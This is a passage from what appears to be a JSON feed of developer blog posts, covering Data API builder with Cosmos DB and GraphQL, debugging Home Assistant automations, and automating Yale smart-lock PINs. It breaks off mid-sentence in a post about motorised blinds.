install the DAB CLI:\n1 dotnet tool install --global Microsoft.DataApiBuilder The CLI is used to help us generate our config file, but also to run a local version of DAB. I’m going to use DAB with a Cosmos DB backend, just to show you how to go about creating a data schema for Cosmos, so you’ll either need a local emulator or deployed Cosmos DB instance (I like to use the cross-platform emulator in a devcontainer).\nLet’s start by initialising the config file:\n1 dab init --config dab-config.json --database-type cosmosdb_nosql --connection-string "..." --host-mode Development --cors-origin "http://localhost:3000" --cosmosdb_nosql-database trivia --graphql-schema schema.graphql This will generate you a config file like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 { "$schema": "https://dataapibuilder.azureedge.net/schemas/v0.5.34/dab.draft.schema.json", "data-source": { "database-type": "cosmosdb_nosql", "options": { "database": "Trivia", "schema": "schema.graphql" }, "connection-string": "..." }, "runtime": { "graphql": { "allow-introspection": true, "enabled": true, "path": "/graphql" }, "host": { "mode": "development", "cors": { "origins": ["http://localhost:3000"], "allow-credentials": false }, "authentication": { "provider": "StaticWebApps" } } }, "entities": {} } Since this is Cosmos DB and we don’t have a database schema we can work with, we’re going to need to create some types in GraphQL for DAB to use:\n1 2 3 4 5 6 type Question @model { id: String! question: String! correct_answer: String! incorrect_answers: [String!]! } This looks pretty standard as far as a GraphQL type is concerned, with the exception of a @model directive that’s been applied to the type. This directive is required to tell DAB that this is a type that we want to generate a full schema for (queries and mutations), and not a type that is a child of another type (in the case of a nested JavaScript object).\nWith our schema defined, we have to tell DAB how to retrieve documents from Cosmos that match that type, and that’s what the entities field in the config file is for. Let’s use the CLI to define a new entity:\n1 dab add Question --source questions --permissions "anonymous:*" This command is defining a new entity called Question, specifying that the collection (source) in Cosmos DB is questions and that we want to allow anonymous access to all operations on this entity. I’m being pretty lazy on the security, but if you want to do it properly you can define different roles and the access they have (create, read, update or delete) to the entity.\nWith this added our config file now looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 { "$schema": "https://dataapibuilder.azureedge.net/schemas/v0.5.34/dab.draft.schema.json", "data-source": { "database-type": "cosmosdb_nosql", "options": { "database": "Trivia", "schema": "schema.graphql" }, "connection-string": "..." }, "runtime": { "graphql": { "allow-introspection": true, "enabled": true, "path": "/graphql" }, "host": { "mode": "development", "cors": { "origins": ["http://localhost:3000"], "allow-credentials": false }, "authentication": { "provider": "StaticWebApps" } } }, "entities": { "Question": { "source": "questions", "permissions": [ { "role": "*", "actions": ["*"] } ] } } } With the config file complete we can now the server:\n1 dab start Now we can load up the GraphQL endpoint, https://localhost:5001/graphql, in your preferred GraphQL IDE (I like to use Banana Cake Pop):\nYou’ll then see the whole GraphQL schema that was generated from the config file and GraphQL types provided:\nIt’s really cool, we have queries just magically generated for us!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 type Query { """ Get a list of all the Question items from the database """ questions( """ The number of items to return from the page start point """ first: Int """ A pagination token from a previous query to continue through a paginated list """ after: String """ Filter options for query """ filter: QuestionFilterInput """ Ordering options for query """ orderBy: QuestionOrderByInput ): QuestionConnection! """ Get a Question from the database by its ID/primary key """ question_by_pk(id: ID, _partitionKeyValue: String): Question } This means we could write a query like this:\n1 2 3 4 5 6 7 8 9 10 query { questions { items { id question correct_answer incorrect_answers } } } And when executed it’ll return all the documents:\nYou can even write complex filter queries that take a subset of the results:\n1 2 3 4 5 6 7 8 9 10 11 12 query { questions(filter: { question: { contains: "What" } }, first: 10) { endCursor hasNextPage items { id question correct_answer incorrect_answers } } } Which will then give us an output such as:\n1 2 3 4 5 6 7 8 9 { "data": { "questions": { "endCursor": "W3sidG9rZW4iOiIrUklEOn41anNMQU83WXk4TVhBQUFBQUFBQUFBPT0jUlQ6MSNUUkM6MTAjSVNWOjIjSUVPOjY1NTUxI1FDRjo4I0ZQQzpBZ0VBQUFBT0FCWUFnS0lBb05pUk5nUUxJQXdBIiwicmFuZ2UiOnsibWluIjoiIiwibWF4IjoiRkYifX1d", "hasNextPage": true, "items": [ ... ] } } } The endCursor is a token that can be used to get the next page of results, using the after input field, and the hasNextPage flag tells us if there are any more pages to get.\nConclusion In this post we’ve looked at how to use GraphQL as a service on Azure, using the Data API builder project. It’s a really cool project that allows you to quickly get up and running with a GraphQL API (or REST if that’s your preference, but this series is GraphQL on Azure, not REST on Azure 😝).\nWith a few commands we can scaffold up DAB, define what the data schema we want to export looks like, connect to an existing database and then start serving up data.\nGo check out the official announcement, and the GitHub repo, the docs and the samples and give it a try!\n", "id": "2023-03-16-graphql-on-azure-part-12-graphql-as-a-service" }, { "title": "Building a Smart Home - Part 10 Debugging!", "url": "https://www.aaron-powell.com/posts/2023-03-01-building-a-smart-home---part-10-debugging/", "date": "Wed, 01 Mar 2023 07:20:28 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "You know what's fun? Having to debug your own home...", "content": "When you get down to it, a smart home is partially a software solution, and like any good software solution there are bugs. I’ve recently been spending some time “debugging” my home, and I thought I’d share some of the things I’ve learned.\nCase sensitivity For home security, I have an automation that runs every night when my phone goes on the wireless charger to close the garage door and gate. This is to ensure that if I forget to close them, they will be closed before I go to bed. Here’s part of that automation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 alias: "Security: End of day" description: "" trigger: - platform: state entity_id: - sensor.aaron_s_phone_charger_type to: wireless condition: - condition: time after: "21:00:00" - condition: state entity_id: group.persons state: Home I didn’t think much of it, I just assumed the automation was working, but one day I noticed that the automation hadn’t run any of the actions. That’s weird, it says it ran, so I had a look at the traces for the automation and I found that it bailed out on the condition.\nThe group.persons entity is defined as so:\n1 2 3 4 5 6 group: persons: name: All People entities: - person.aaron - person.mel And I knew that we were both home, but looking back through the history it turned out the automation had never run. Ok, we’ve got a bug to fix. Having a look at the trace log for the automation, I noticed this when it hit the condition:\nResult: result: true state: home wanted_state: Home sigh I had a typo in the automation, I had Home instead of home. I fixed the typo and the automation started working as expected… well, it actually uncovered another bug.\nWhy is the gate open A few posts ago I wrote about controlling out motorised gate and it’s basically the same approach we have for the garage door (the motor operates in a very similar manner).\nLet’s go back to the automation from the last section, and look at the actions:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 alias: "Security: End of day" description: "" trigger: - platform: state entity_id: - sensor.aaron_s_phone_charger_type to: wireless condition: - condition: time after: "21:00:00" - condition: state entity_id: group.persons state: home action: - service: cover.close_cover data: {} target: entity_id: - cover.garage_door - cover.roller_gate - service: lock.lock data: {} target: entity_id: lock.0x000d6f0010c98b1e mode: single It does two things, calls cover.close_cover to close the garage and gate, and lock.lock to lock the front door. I can see in the trace that they run as expected, and thankfully the front door was locked, but why are the gate and garage door open?\nWell, it turns out that the cover entities I had for both had a bug in them. I had defined them as so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 - platform: template covers: garage_door: device_class: garage friendly_name: "Garage Door" value_template: >- {% if is_state('binary_sensor.garage_door_contact','on') %} Open {% else %} Closed {% endif %} open_cover: - service: switch.turn_on data: entity_id: switch.garage_door close_cover: - service: switch.turn_on data: entity_id: switch.garage_door stop_cover: service: switch.turn_on data: entity_id: switch.garage_door icon_template: >- {% if is_state('binary_sensor.garage_door_contact','on') %} mdi:garage-open {% else %} mdi:garage {% endif %} Can you see the problem? The close_cover (and open_cover for that matter) are defined to call switch.turn_on which triggers the Shelly to turn on and start the motor. The problem is, it will do this without first checking should it do it, the service doesn’t know the state of the garage or gate, that’s provided by a binary_sensor (from an Aqara contact sensor) and is only visually represented by the value_template and icon_template.\nTo fix this I had to change the close_cover (and open_cover) to have a condition that checks the door state first:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 - platform: template covers: garage_door: device_class: garage friendly_name: "Garage Door" value_template: >- {% if is_state('binary_sensor.garage_door_contact','on') %} Open {% else %} Closed {% endif %} open_cover: - condition: state entity_id: binary_sensor.garage_door_contact state: "off" - service: switch.turn_on data: entity_id: switch.garage_door close_cover: - condition: state entity_id: binary_sensor.garage_door_contact state: "on" - service: switch.turn_on data: entity_id: switch.garage_door stop_cover: service: switch.turn_on data: entity_id: switch.garage_door icon_template: >- {% if is_state('binary_sensor.garage_door_contact','on') %} mdi:garage-open {% else %} mdi:garage {% endif %} Now if the sensor returns “off”, which means the door is open, it can call switch.turn_on and close the garage, but if it’s “on” (the door is closed) it won’t call switch.turn_on and the garage door won’t move.\nNo more waking up to the garage door open!\nWhy did that light turn on I’ve talked at length about how I control our fans and to make them better I added some Shelly’s so now the ceiling fans pretty much don’t get turned off, from a power standpoint, we just send the right RF signals.\nWell, the other day at 1am my wife and I were rudely woken up to the light in our bedroom being on at fully brightness. Queue me fumbling around to grab my phone, open the HA app, finding it not responding for some reason and having to get out of bed to turn the light off (and wait the 10s for it to turn off - thanks to an automation).\nThis wasn’t the first time I’d noticed the fan light in our room turning on at random times and only the second time that it’d done it in the middle of the night to wake us up, so it was time to figure out what was going on.\nWhen I was awake in the morning I went to the HA logs and found that the light was turned on by this automation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 alias: "Lighting: Toggle parents light on switch change" description: "" trigger: - platform: state entity_id: - binary_sensor.parents_bedroom_channel_1_input - binary_sensor.parents_bedroom_channel_2_input condition: [] action: - if: - conditions: - condition: template value_template: "{{ is_state(light, 'on') }}" alias: Light on then: - if: - condition: time after: "21:00:00" then: - delay: hours: 0 minutes: 0 seconds: 10 milliseconds: 0 - service: light.turn_off target: entity_id: "{{ light }}" else: - service: light.turn_on target: entity_id: "{{ light }}" mode: single variables: light: >- {{ 'light.parents_fan' if trigger.entity_id == 'binary_sensor.parents_bedroom_channel_1_input' else 'light.parents_downlights' }} In this case I’m using the Shelly’s in Detached Switch mode and relying on the automation to turn them on or off as required. The mistake I have here is what triggers we’re using, or more accurately, I have an assumption about the state that the switch can be to trigger the automation.\nI incorrectly assumed that the state of the switch would be on or off, but it turns out there is at least one other state, unavailable. This state happens if the Shelly reboots, loses power or the network connection is lost. In this case the automation is triggered and the light is turned on.\nNow Shelly’s are pretty stable devices, but the reason that I hit it this particular time is that we’d had a restart in our UDM from an update, so the network dropped briefly, the Shelly went to unable and then the automation triggered and turned the light on.\nTo fix this, I made the triggers a lot more specific, I really only care if you go from on to off, or vice versa, so I changed the automation triggers to:\n1 2 3 4 5 6 7 8 9 10 11 12 13 trigger: - platform: state entity_id: - binary_sensor.parents_bedroom_channel_1_input - binary_sensor.parents_bedroom_channel_2_input to: "on" from: "off" - platform: state entity_id: - binary_sensor.parents_bedroom_channel_1_input - binary_sensor.parents_bedroom_channel_2_input to: "off" from: "on" I also decided to use a choose action rather than an if and only handle the on and off case.\nThe light now works as expected and we haven’t had any more random light turning on in the middle of the night.\nWhy won’t the light turn off From one light problem to another and again the culprit is the fan lights, but this time in our kids bedrooms. The kids have two lights in their room, the fan light and a wifi LED bulb in their lamp that can do a bunch of colours and effects, the main one we use being a nightlight effect. For their fan lights I have an automation that turns the light on or off, unless it’s after bed time, then instead of turning it off, it’ll turn the lamp to Night Light, which in turn turns the fan light off.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 alias: "Lighting: Kids fan light switch toggle" description: "" trigger: - platform: state entity_id: - binary_sensor.kid1_room_input - binary_sensor.kid2_room_input condition: [] action: - if: - condition: template value_template: "{{ is_state(light, 'on') }}" then: - if: - condition: time after: "18:45:00" then: - service: light.turn_on data: effect: Night light target: entity_id: "{{ lamp }}" else: - service: light.turn_off target: entity_id: "{{ light }}" else: - service: light.turn_on target: entity_id: "{{ light }}" mode: single variables: light: >- {{ 'light.kid1_fan' if trigger.entity_id == 'binary_sensor.kid1_room_input' else 'light.kid2_fan' }} lamp: >- {{ 'light.kid1_lamp' if trigger.entity_id == 'binary_sensor.kid2_room_input' else 'light.kid2_lamp' }} It might seem like we have an overly complex set of automations, like the fact that we don’t always control the light from the switch, but using the nightlight like this works great as we can set the scene of the bedroom in one set of commands and it’s controllable from HA and the Google Home, so the kids can control it themselves.\nBut there’s a problem, what happens if it’s after 6.45pm and the lamp is already in Night Light mode? Well, the switch will set the effect but it doesn’t change anything which means that it doesn’t trigger the next automation in the chain, so the light stays on and there’s no way to turn it off (short of using the HA app). Yeah, this wasn’t wasn’t a great experience when I was helping our youngest change his PJ’s in the middle of a night after an accident, having to then fumble around turning the lamp off and back on to get it off the effect to then turn the fan light off.\nAgain, this was a relatively easy fix, I added an additional condition to check if the lamp had the effect set to Night Light and if it did, then don’t set it again, go to the turn off light step.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 alias: "Lighting: Kids fan light switch toggle" description: "" trigger: - platform: state entity_id: - binary_sensor.angus_s_room_input - binary_sensor.reuben_s_room_input condition: [] action: - if: - condition: template value_template: "{{ is_state(light, 'on') }}" then: - if: - condition: time after: "18:45:00" - condition: template value_template: >- {{ not is_state(lamp, 'unavailable') or not is_state(lamp, 'on') }} then: - service: light.turn_on data: effect: Night light target: entity_id: "{{ lamp }}" else: - service: light.turn_off target: entity_id: "{{ light }}" else: - service: light.turn_on target: entity_id: "{{ light }}" mode: single variables: light: >- {{ 'light.angus_fan' if trigger.entity_id == 'binary_sensor.angus_s_room_input' else 'light.reuben_fan' }} lamp: >- {{ 'light.anguss_lamp' if trigger.entity_id == 'binary_sensor.angus_s_room_input' else 'light.wiz_rgbw_tunable_355b12' }} (I also check if the lamp isn’t unavailable as one of the bulbs tends to go offline randomly and can only be fixed by a power cycle… not ideal in the middle of the night).\nWrapping up Ah debugging, who’d think I would have to do that of my own house, but here we are!\nThe problems that I’ve looked at here are really easy mistakes to make as a beginner with Home Assistant.\nIf you’re putting state-based conditions, ensure that you verify the case of the states that you’re testing against, especially if they are states that are generated by non-standard entities. Diving into the traces of the automations can be a great way to see what’s going on and why things aren’t working as expected.\nAlso, be aware of the states beyond the ones that you actually care about. Because I wasn’t taking into consideration the unavailable state, I was getting unexpected results - the lights were turning on. Having additional conditions to check for the states that you don’t care about can help to avoid these issues.\nLastly, when using templated entities, ensure that you know where the state is maintained. Because the state of my cover entities are separated from the entity itself - we’re using template to display the right label/icon, it didn’t actually know to not trigger the switch that opens/closes the garage/gate. But it’s an easy fix with conditions on the service calls.\nWith these fixes sorted out everyone is a lot happier. Sure, there’ll be more bugs to come, but knowing these things that can catch me out will help me to avoid them in the future.\n", "id": "2023-03-01-building-a-smart-home---part-10-debugging" }, { "title": "Building a Smart Home - Part 9 Door Locks", "url": "https://www.aaron-powell.com/posts/2023-02-13-building-a-smart-home---part-9-door-locks/", "date": "Mon, 13 Feb 2023 02:50:43 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Because a physical key is so old school", "content": "I really like the idea of having a smart door lock on our front door, something about the peace of mind that I can know if they door is locked or not, control access and all those things, so getting a “smart” lock was something I started researching long before we moved into our new house (even before we had doors installed! 🤣).\nI’m going to refer to the locks as “smart” in quotes as generally speaking the locks themselves aren’t smart, it’s the systems around them that you build that are. Calling it a “connected lock” is probably more accurate, but semantics.\nRequirements While there are a lot of options on the market it was important for me to get the right one, and everyone has opinions on what constitutes right, so here are the things that I looked at (initially - I changed some stances over time and I’ll explain why later):\nIt integrates with our existing deadbolt It still have key access We can control who has access It’s not cloud enabled It integrates with Home Assistant I can control it from my phone It will report state I don’t feel like I’m entering an office building Exploring Options I started doing research around and a few of the early contenders were the Danalock v3 and the August Smart Lock. These both satisfied a lot of the criteria, they retrofit to an existing deadbolt by replacing the back, meaning that the front is still a standard lock (so keys can be used), they integrate into Home Assistant (through an additional hub admittedly but still) and they can be controlled via a phone. But their biggest win was that they didn’t change the look of your door, there was no visibility that you had a “smart” lock installed, which seemed like a good idea for reducing potential attack vectors.\nAnother even more enticing option is the Level Bolt, as it is completely hidden inside the doorframe, which seems really neat! But it looks like it’s mostly designed for the Apple ecosystem, which I’m not invested in, so I dropped it (it might be exposed via HomeKit to Home Assistant, but it’d still require more hoops than I’d like).\nSo there’s a variety of options out there, so let’s start thinking about the usability of them.\nManaging Access Now that I had some product options in mind, it was time to start thinking about just how we’d use the lock. The primary users of the house are myself and my wife (the kids don’t need to be able to let themselves in yet, they’re a bit young for that still), but then we have secondary users, such as our cleaner, our parents, when we’re away either a house sitter or friend who will look after the pets, and now the useability is becoming more complex.\nThinking of the model that the Danalock or August represent - an app centric approach, we’d either be having to “onboard” a lot of people of varying technical skills or handing out keys. Fundamentally, we want to reduce the number of keys in circulation, that’s part of the point of having keyless access, but this was not really going to solve it. And this was the main point I needed to overcome in what I wanted out of a “smart” lock.\nExploring Options… Again I was initially very much against the idea of having a NFC fob, digital PIN or similar for the door, to me this seemed like it would be very… office-y, and it was a home, not an office (which yes, both my wife and I work from home, so it is an office… BUT THAT’S BESIDES THE POINT! 😝).\nIt turns out that all three options above had digital PIN pads that you can get as addons, but now it’s starting to look expensive and complex, a lock, a bridge and a PIN pad, so I went looking at integrated options.\nI ended up coming across the Yale Assure Keyed lock as I knew a few people who recommended them, I think it looks fairly slick, and most of all, it’s 100% offline - no cloud connectivity, everything is managed on the device, from the PIN’s generated, the profiles, the time those PINs are valid for, etc. Yale is also a reasonably well known brand within the lock-space, so it was reassuring that it wasn’t likely a company that could vanish and leave me with an unusable produce (interesting aside, August is actually a sub-brand of Yale).\nBut because I wanted it integrated with Home Assistant, I picked up a ZigBee network module and organised for our locksmith to come out (you can install it yourself, but we have a family friend who’s a locksmith and they were going to upgrade all our locks from the ones the builder installed as he said they were all woefully bad 😅):\nCall a locksmith! pic.twitter.com/kaRJi16Tm5\n— Aaron Powell (@slace) August 29, 2022 Integrating with Home Assistant Since I’m using the ZigBee network module, integration with HA was reasonably trivial, I installed the module, put it into pairing mode and it joined my network:\nThere’s a heap of stuff that is exposed via the integration from the lock:\nThe control at the top is what you’d expect, an option to lock or unlock the lock, depending on its current state. The sensors are used it indicate that the lock is doing something, for example, when someone uses the PIN pad to unlock it will:\nSet the Action to unlock Set the Action source name to keypad Set the Action user to the user ID that the PIN is associated with These sensors are all then set to None immediately, so the value isn’t stored, but you could have an automation that triggers based on the (brief) state change.\nI’m yet to play with the Configuration section, and Diagnostics is, well, just that - I only care about the battery level.\nAutomations With the lock setup in HA we can now do automations with it and the first one I did was tackle a problem we had - forgetting to lock the door at night.\nAuto-locking with NodeRED For this one, I decided to experiment and use NodeRED, which is a visual workflow tool that can be used with HA (my friend Lars has a video on getting started if you want to check it out, but as an aside, I don’t really use NodeRED anymore, I find standard HA automations do the trick).\nThe way this automation works is that one of three events can trigger it, the time hits 9pm, it’s manually invoked, or my phone goes on the wireless charger (which we only have one of and it’s on our bedhead). When triggered, we read the state of the lock, which returns locked or unlocked and using a switch node we check for unlocked and if it is, it’ll call the service in HA to lock the lock and send a notification to my phone to tell me I forgot to lock the front door.\nAdvanced Automations That automation is pretty simple, but let’s try something a bit more advanced. I was talking to my friend Tatham, who also has the Yale Assure lock, and he was telling me about some of the stuff he did with his, like issuing PINs and setting time windows. This made me think of an innovative way to handle our cleaners access. Our cleaner comes once a fortnight so we issued them a PIN to access the house, but I really don’t need that PIN to be active outside of the day they come, so, let’s set it up as a time-based PIN.\nI started off by creating a boolean helper called cleaner_day, which we use to visually indicate that the cleaner is coming on our HA dashboard. I then adapted a pattern that Tatham had and defined three more helpers, a text helper for the PIN, a text helper for the user ID on the lock and a select helper to indicate the status of the PIN:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 input_text: lock_cleaner_pin: name: "Lock: Cleaner PIN" icon: mdi:lock-smart pattern: "[0-9]{0,8}" lock_cleaner_id: name: "Lock: Cleaner User ID" initial: "20" icon: mdi:information-variant input_select: lock_cleaner_status: name: "Lock: Cleaner PIN Provisioning Status" icon: mdi:lock-smart options: - Disabled - Pending - Registered - Failed I created two automations that will enable/disable cleaner day:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 - id: "1661944479647" alias: "Cleaner: Enable Cleaner Day" description: "" trigger: - platform: time at: 05:00:00 condition: - condition: time weekday: - wed - condition: template value_template: "{{(as_timestamp(now())|timestamp_custom ('%U') | int % 2) == 0 }}" action: - service: input_boolean.turn_on data: {} target: entity_id: input_boolean.cleaner_day - id: "1661944938684" alias: "Cleaner: Disable Cleaner Day" description: "" trigger: - platform: time at: "23:00:00" condition: - condition: time weekday: - wed - condition: state entity_id: input_boolean.cleaner_day state: "on" action: - service: input_boolean.turn_off data: {} target: entity_id: input_boolean.cleaner_day mode: single Both automations run on Wednesday (the day they come) but the “enable” only runs on every second one. I could probably improve the enabling Cleaner Day using some of the new features around events, but this works.\nNow that HA knows that it’s the day the cleaner is coming, we can have another automation run to enable their PIN.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 alias: "Security: Cleaner PIN Enable/Disable" mode: queued trigger: - platform: state entity_id: - input_boolean.cleaner_day action: - variables: user_id: "{{ states('input_text.lock_cleaner_id') | int }}" user_enabled: "{{ is_state('input_boolean.cleaner_day', 'on') }}" user_pin: "{{ states('input_text.lock_cleaner_pin') }}" - service: input_select.select_option target: entity_id: input_select.lock_cleaner_status data: option: Pending - service: mqtt.publish data: topic: zigbee2mqtt/<friendly name>/set payload_template: | {{ { "pin_code": { "user": user_id, "user_type": "unrestricted", "user_enabled": user_enabled, "pin_code": user_pin if user_enabled else None } } | to_json }} - wait_for_trigger: - id: active_confirmation platform: mqtt topic: zigbee2mqtt/<friendly name>/action payload: "{{ 'pin_code_added' if user_enabled else 'pin_code_deleted' }}" timeout: minutes: 1 - choose: - conditions: "{{ wait.trigger.id == 'active_confirmation' }}" sequence: - service: input_select.select_option target: entity_id: input_select.lock_cleaner_status data: option: "{{ 'Registered' if user_enabled else 'Disabled' }}" default: - service: input_select.select_option target: entity_id: input_select.lock_cleaner_status data: option: Failed Now the first thing you might wonder is why this is a separate automation and not bundled into the other ones. Well the primary reason is so that if we had an additional day that we book the cleaner for, we can manually change the cleaner_day helper and this automation will run.\nThis automation is somewhat complex, so let’s break it down. First, we’re going to use some variables for the important data, rather than constantly using the entity IDs:\n1 2 3 4 - variables: user_id: "{{ states('input_text.lock_cleaner_id') | int }}" user_enabled: "{{ is_state('input_boolean.cleaner_day', 'on') }}" user_pin: "{{ states('input_text.lock_cleaner_pin') }}" We’ll then report that we’re provisioning PIN access for the cleaner:\n1 2 3 4 5 - service: input_select.select_option target: entity_id: input_select.lock_cleaner_status data: option: Pending This is mostly for some debugging workflows, but I do find it somewhat useful to know this. Now we’re going to have to instruct the lock that we’re changing a PIN. Since I’m using ZigBee2MQTT we can fire MQTT messages to the lock, and one of those is updating the PIN by providing a JSON payload:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 - service: mqtt.publish data: topic: zigbee2mqtt/<friendly name>/set payload_template: | {{ { "pin_code": { "user": user_id, "user_type": "unrestricted", "user_enabled": user_enabled, "pin_code": user_pin if user_enabled else None } } | to_json }} We grab the variables defined earlier and add that to some hardcoded stuff. The user_type is set to unrestricted, as this field is used to create schedules on the lock itself, but we manage that in HA so unrestricted is fine as it basically says “this user is known and allowed, let them in”. For the pin_code field, we either set it to their PIN, or set it to “null” (via None) if they are having access disabled. You could do this slightly differently by setting the user_type to non_access and not messing with the PIN, as that means they are recognised but don’t have access, but I find this works just as well.\nLastly, we wait for a minute to get a MQTT response, and update the provisioning state with the outcome, or set it to Failed if it times out.\nHere is it in action on the dashboard:\nI have a similar automation that will run when the PIN of any user in our system changes, such as the House Sitter PIN, which is randomly generated when we enable House Sitter access so each time we have a new PIN that only exists for the duration of their stay, and set the input_text.house_sitter_pin which then triggers an automation to activate/deactivate any PIN:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 alias: "Security: User PIN Change" mode: queued trigger: - platform: state entity_id: - input_text.lock_house_sitter_pin - input_text.lock_cleaner_pin - input_text.lock_guest_pin - input_text.lock_aaron_pin - input_text.lock_mel_pin - input_text.lock_mel_parents_pin - input_text.lock_aaron_parents_pin variables: user_id: >- {{ states(trigger.entity_id | regex_replace(find='_pin', replace='_id', ignorecase=False)) | int }} status_entity_id: >- {{ trigger.entity_id | regex_replace(find='_pin', replace='_status', ignorecase=False) | regex_replace(find='_text', replace='_select', ignorecase=False) }} action: - variables: pin: "{{ states(trigger.entity_id) }}" user_enabled: "{{ not is_state(trigger.entity_id, '') }}" - service: input_select.select_option target: entity_id: "{{ status_entity_id }}" data: option: Pending - service: mqtt.publish data: topic: zigbee2mqtt/<friendly name>/set payload_template: | {{ { "pin_code": { "user": user_id, "user_type": "unrestricted", "user_enabled": user_enabled, "pin_code": pin if user_enabled else None } } | to_json }} - wait_for_trigger: - id: active_confirmation platform: mqtt topic: zigbee2mqtt/<friendly name>/action payload: "{{ 'pin_code_added' if user_enabled else 'pin_code_deleted' }}" timeout: minutes: 5 - choose: - conditions: "{{ wait.trigger.id == 'active_confirmation' }}" sequence: - service: input_select.select_option target: entity_id: "{{ status_entity_id }}" data: option: "{{ 'Registered' if user_enabled else 'Disabled' }}" default: - service: input_select.select_option target: entity_id: "{{ status_entity_id }}" data: option: Failed This automation is largely the same as the cleaner one, but the trigger is different and it means that if anyone wants their PIN changed, all we have to do is update the appropriate helper and it should just work (this wouldn’t work for the cleaner as you’d either have to let them know of a new PIN each visit, or store their old PIN somewhere set it back to).\nConclusion There are a few other automations I’ve got around lock/unlock based on various conditions, but these are the most interesting ones I have and they have been working solidly for nearly six months.\nI always thought that I’d find a “smart” door lock useful, but this is one of those things that it’s just amazing how quickly we adapted to it. These days we don’t carry keys with us, unless it’s the car key, and then we only take the keyless entry FOB with us, we even traveled internationally and didn’t take a key, we just don’t need to, the PIN pad is so convenient. Even our kids have adapted to it, they quickly learnt my wifes PIN and now will race us home from school and fight over who gets to unlock the door.\nIt’s also been super convenient with house sitters, we haven’t had to work out the logistics to leave keys somewhere and then pick them up again, just issue a PIN and send through instructions on how to use it.\nSo far the only problem I’ve had is early on there would be times when the lock wouldn’t respond to requests or it wouldn’t report state correctly, meaning that it would tell us it’s unlocked at night but wouldn’t lock. While I wasn’t able to get a definitive answer (it’s not like I could pull the logs from the lock), the problem seemed to be that the lock bolt was rubbing on the striker plate and this was causing the lock to go into a fault mode and stop responding on ZigBee. Some adjustments to the striker plate and this seems to have resolved itself and we haven’t had problems for probably four months now.\nI still really like the initial options I looked at, such as the August and Danalock, but for day-to-day use, not having to get out a phone to unlock, and also not having to install a separate PIN pad, has made me realise that the Yale is really a great choice for the primary entranceway (I may get the others for the other deadbolts in the house, but that’s a low priority).\nUltimately, the Yale has been great and I would 100% recommend it to others. It was simple to install (well… get installed in my case!), it is easy to use (our 4 year old can do it) and it integrates nicely with Home Assistant on ZigBee (and I’d assume Z-Wave, I just haven’t tried it. Yale US have also said they are working on a Matter network module too) so you can automate it with no problems.\n", "id": "2023-02-13-building-a-smart-home---part-9-door-locks" }, { "title": "Building a Smart Home - Part 8 Motorised Blinds", "url": "https://www.aaron-powell.com/posts/2023-02-03-building-a-smart-home---part-8-motorised-blinds/", "date": "Fri, 03 Feb 2023 02:44:03 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Next job on the smart home, motorised blinds", "content": "We’ve got a lot of windows in our new house, for example the main bedroom has four windows. This means we have an awesome amount of natural light (we rarely need to turn lights on during the day!) but we’re forever having to go around opening and closing them.\nBecause of this, motorised blinds have always been an appealing idea to me so it’s time to tackle this aspect of the smart home.\nThe blinds we have are roller blinds and there’s two ways to motorise them, a motor within the blind itself or something you run the chain through. Since the blinds are brand new, I didn’t want to replace them by putting a motor into them, instead I decided to go with the simpler option of having a controller on the wall to run the chain through. I also feel this to be a less invasive solution and easier to walk back from in future.\nThere’s motors and then there’s motors Researching around, there are a lot of different options out there, some are ZigBee, some are Z-Wave, some are Bluetooth/Bluetooth Low Energy (BLE) and some are RF. You might have noticed wifi isn’t an option and that’s because wifi is not a particularly common protocol for these kinds of devices. Wifi requires a lot of energy (relatively speaking) so it’s not ideal for battery powered devices like these and we are going to have a motor which also requires power so we’re better sticking to a low-powered communication protocol.\nWhile I was trying to work out what options to go with a friend offered me three different ones that he wasn’t using (under the provision that I don’t return them 🤣), Teptron Move, Soma Smart Shades 2 and Axis Gear. The first two are Bluetooth/BLE and the Gear uses ZigBee.\nQuick aside as I haven’t mentioned ZigBee before. ZigBee is a wireless protocol designed for low-powered devices and somewhat common in the smart home ecosystem. It works a bit like a mesh wifi network but operates separately to wifi (it does share 2.4GHz) but you need a hub of some sort that will turn the ZigBee signal into something consumable on your network/within Home Assistant. You’ll find plenty of stuff on YouTube about ZigBee if you want to learn more. Personally, I use a ConBee II for my ZigBee hub and ZigBee2MQTT in Home Assistant.\nThe Soma was a device that I had been looking at as one to get, it’s a small and compact unit, which would wouldn’t be offensive on our windows, compared to a lot of options. It also has integration to Home Assistant, at least at a cursory glance (more on that later), so it seemed like it could fit the 